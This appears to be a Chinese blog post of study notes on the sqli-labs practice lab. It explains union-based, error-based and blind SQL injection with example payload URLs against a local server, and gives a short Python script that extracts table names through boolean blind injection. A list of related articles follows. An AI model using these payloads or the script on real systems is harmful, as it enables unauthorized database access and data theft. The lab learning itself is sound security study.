题目1-20

github地址

前言

以前对于SQL注入,就是先判断下能不能注入,可以的话先试着联合查询,不行的话再上SQLMap,去年寒假拿了一本《SQL注入攻击与防御》,拿回家,看了几章就看不下了,最近终于下定决心,把sqli刷一遍,这周做了20题,收获颇丰,做个笔记记录一下

SQL注入基本分类

  • 基于错误型
  • 联合查询
  • 盲注
  • 其他

联合查询

题目1,2,3,4,11,12

这种平时最常用的,order by然后union select1,2,3。然后逐渐利用元数据爆数据库,报表,爆字段。但是对原理一知半解。

这里来初步总结下

利用条件

存在注入且会讲数据库查询的内容显示在页面上

基本原理

UNION is used to combine the result from multiple SELECT statements into a single result set.这是官方文档,也就是说union是把多个select的句子输出到同一个结果里面。

看例子。正常的select



这里我们用上union



我们想一想,本来页面是这样的

上面两个是通过数据库返回的结果输出的,那我们可不可以通过一些手段让我们要的结果在这里输出呢,因为使用了union,所以返回结果是union前面和后面的累加,那我们只要让前面无结果输出,那么输出的结果不就是union后面我们自己构建的。



就像这样。那我们操控union 后面的select就可以看到我们要的结果,比如

具体例子

首先,因为union前面列数必须一致,我们必须找出实际列数。这里我们使用了order by,order by 是排序函数,因为order by 排序列数多于实际列数会报错。

http://127.0.0.1/sqli/Less-1/?id=1' order by 4 --+

http://127.0.0.1/sqli/Less-1/?id=1' order by 3 --+



接下来,我们判断那些列数会输出来,又3列,但并非所有列都会在页面里面输出

http://127.0.0.1/sqli/Less-1/?id=-1' UNION SELECT 1,2,3 --+



接下来,我们就要在2和3的地方写函数来爆出我们想要的结果。

先爆数据库,用自带函数database()

http://127.0.0.1/sqli/Less-1/?id=-1' UNION SELECT 1,database(),3 --+



接下来以此爆表,爆字段,用到mysql5.0之后自带了一个表information_schema可以利用,在这里不一一展示。

基于错误型注入

题目:5,6,13,14,17,18,19,20

利用条件

存在注入且将mysql报错结果显示在页面上



所以我们要做的就是要让系统帮我们把我们想要的结果通过报错爆给我们

利用方式

floor报错

原理:看这篇文章MySQL Duplicate entry报错注入原理,其实简单来讲就是都是由于我们故意把种子写死,二次查询的时候主键冲突

简单介绍下怎么用把



然后认为控制floor(rand(0)*2)这个参数就行。



每次该改变database()哪个函数的值就行了

刚开始先回用,看不懂原理不要紧,以后用的熟练点再回来来看原理

updatexml报错



这是updatxml的官方文档,这里我们利用的就是第二个参数如果不符合xpath规定,会报错。我们认为控制这个参数

盲注

题目8,9,10,15,16

对于盲注,我以前的观点一直是看能不能叫个脚本,能套就好,也没去深究原理,但是最近对工具以及脚本的理解是工具只能做我们重复,但是不想做的事情。而不是不明原理的,一味的使用。这里都是脚本都不是一个完整的成套的脚本。

利用条件

适用于存在注入,没有报错,且查询到的结果不能显示再页面上。

分类

  • 布尔型盲注
  • 基于时间的盲注

    不同之处在于布尔型盲注正确与否返回的结果是不一样的,但是基于时间的是一样的

几个函数

substr()

mid()

left()

if()



还是官方文档来的容易看,还有例子

实际例子

第8题

正常



出错



只有这两个页面

这时我们按照原先联合查询思路。

但是到

http://127.0.0.1/sqli/Less-8/?id=1%27%20union%20select%201,2,3--+

这里开始不一样了,因为他的即使是正确的结果也不会回显出来。这时我们可以用手动判断他正不正确,不一定要爆出来。

本来数据库中的语句是

select x from XX where xx=xx

那我们就构造语句返回true或者false,使这个语句成为where的字句,用and 连接。

http://127.0.0.1/sqli/Less-8/?id=1%27%20and%20length(database())%20=1%20--+

报错

http://127.0.0.1/sqli/Less-8/?id=1%27%20and%20length(database())%20=8%20--+

正常

然后用substr

http://127.0.0.1/sqli/Less-8/?id=1'  and substr(datebase(),1,1)='a'

然后修改第二个参数可以得到不同的位数。

可能很多版本又说用ascii这个函数,那应该就是为了折半查找方便。

然后修改datbase()这个函数依次达到报表,爆库的作用。

下面简单贴出用python脚本报表的一个小脚本

import requests
s='''http://127.0.0.1/sqli/Less-8/?id=1\'  and length((select table_name from information_schema.tables where table_schema=(select database()) limit 0,1))={i}  --+'''
for i in range(100):
    url=s.format(i=i)
    content=requests.get(url,timeout=60).text
    if "You are in" in content:
        print i
        break
s='''http://127.0.0.1/sqli/Less-8/?id=1\'  and substr((select table_name from information_schema.tables where table_schema=(select database()) limit 0,1 ),{j},1)=\'{e}\' --+'''
check_char='123456789qwertyuiopasdfghjklzxcvbnm@'
data=""
for j in range(1,i+1):
    for e in check_char:
        url=s.format(j=j,e=e)
        content=requests.get(url,timeout=60).text
        if "You are in" in content:
            data+=e
            print data
            break

下面是运行界面

------------------------------------

未完待续

其他

题目:7,

Sqli-Labs学习总结一的更多相关文章

  1. Sqli labs系列-less-1 详细篇

    要说 SQL 注入学习,网上众多的靶场,就属 Sqli labs 这个系列挺不错的,关卡达到60多关了,我自己也就打了不几关,一个挺不错的练习SQL注入的源码. 我一开始就准备等我一些原理篇总结完了, ...

  2. SQLI LABS Basic Part(1-22) WriteUp

    好久没有专门练SQL注入了,正好刷一遍SQLI LABS,复习巩固一波~ 环境: phpStudy(之前一直用自己搭的AMP,下了这个之后才发现这个更方便,可以切换不同版本的PHP,没装的小伙伴赶紧试 ...

  3. Sqli labs系列-less-3 。。。

    原本想着找个搜索型的注入玩玩,毕竟昨天被实力嘲讽了 = = . 找了好长时间,我才发现,我没有 = = ,网上搜了一个存在搜索型注入的源码,我看了好长时间,楞没看出来从哪里搜索注入了....估计是我太 ...

  4. Sqli labs系列-less-2 详细篇

    就今天晚上一个小插曲,瞬间感觉我被嘲讽了. SQL手工注入这个东西,杂说了吧,如果你好久不玩的话,一时说开了,你也只能讲个大概,有时候,长期不写写,你的构造语句还非常容易忘,要不我杂会被瞬间嘲讽了啊. ...

  5. SQL注入系列:SQLi Labs

    前言 关于注释 说明:在SQL中--[空格]表示注释,但是在URL中--空格在发送请求的时候会把最后的空格去掉,所以用--+代替,因为+在被URL编码后会变成空格 MYSQL有三种常用注释: --[空 ...

  6. Sqli labs系列-less-5&6 报错注入法(上)

    在我一系列常规的测试后发现,第五关和第六关,是属于报错注入的关卡,两关的区别是一个是单引号一个是双引号...当然我是看了源码的.... 基于报错注入的方法,我早就忘的差不多了,,,我记的我最后一次基于 ...

  7. Sqli - Labs 靶场笔记(一)

    Less - 1: 页面: URL: http://127.0.0.1/sqli-labs-master/Less-1/ 测试: 1.回显正常,说明不是数字型注入, http://127.0.0.1/ ...

  8. SQLI LABS Challenges Part(54-65) WriteUp

    终于到了最后一部分,这些关跟之前不同的是这里是限制次数的. less-54: 这题比较好玩,10次之内爆出数据.先试试是什么类型: ?id=1' and '1 ==>>正常 ?id=1' ...

  9. SQLI LABS Stacked Part(38-53) WriteUp

    这里是堆叠注入部分 less-38: 这题啥过滤都没有,直接上: ?id=100' union select 1,2,'3 less-39: 同less-38: ?id=100 union selec ...

  10. SQLI LABS Advanced Part(23-37) WriteUp

    继续继续!这里是高级部分! less-23: 提示输入id参数,尝试: ?id=1' and '1 返回的结果与?id=1相同,所以可以直接利用了. ?id=1' order by 5# 可是页面返回 ...

随机推荐

  1. 一些实用而又记不住的css技巧

    user-select 禁止用户选中文本 div { user-select: none; /* Standard syntax */ } 清除手机tap事件后element 时候出现的一个高亮 * ...

  2. JavaScript基础知识(二)

    一.JavaScript事件详解 1.事件流:描述的是在页面中结束事件的顺序 事件传递有两种方式:冒泡与捕获. 事件传递定义了元素事件触发的顺序. 如果你将 <p> 元素插入到 <d ...

  3. JFreeChart与AJAX+JSON+ECharts两种处理方式生成热词统计可视化图表

    本篇的思想:对HDFS获取的数据进行两种不同的可视化图表处理方式.第一种JFreeChar可视化处理生成图片文件查看.第二种AJAX+JSON+ECharts实现可视化图表,并呈现于浏览器上.   对 ...

  4. DVWA笔记之二:Command Injection

    命令注入 1.Low级别 <?php  if( isset( $_POST[ 'Submit' ]  ) ) {      // Get input      $target = $_REQUE ...

  5. C3P0数据库连接池使用中的问题

    java.io.FileNotFoundException: D:\javaStudy\javaee\.metadata\.plugins\org.eclipse.wst.server.core\tm ...

  6. Maven详解(四)------ 常用的Maven命令

    这章我们讲讲几个常用的 Maven 命令.由于执行命令是在工程的基础上来的,所以我们要先创建一个 Maven 工程,具体如何创建,在上一篇博客已经介绍了:http://www.cnblogs.com/ ...

  7. fs模块(二)

    1. renameSync 01. 重命名 02. 移动文件夹,相当于剪切作用 var fs = require('fs'); // 01 文件重命名 var renameFile = (oldFil ...

  8. c#通过反射获取自定义属性

    PropertyInfo[] properties = typeof(BPM_ContractApproval_Purchase).GetProperties(); foreach (var prop ...

  9. 记一次VS Code崩溃的解决(Win10扫描自动回复系统文件)

    早上修改Vue.js框架搭建的项目,正高兴着,突然电脑崩溃,重启后VS code打不开,报错如下: DWrite.dll丢失 然后查看了一下 C:\windows\system32\下  DWrite ...

  10. 【Spring 核心】装配Bean(一) 自动化装配

    Spring从两个角度实现自动化装配:组件扫描 (Spring自动发现应用上下文中所创建的bean)自动装配(autowiring)自动满足bean之间的依赖 组件扫描: package test.s ...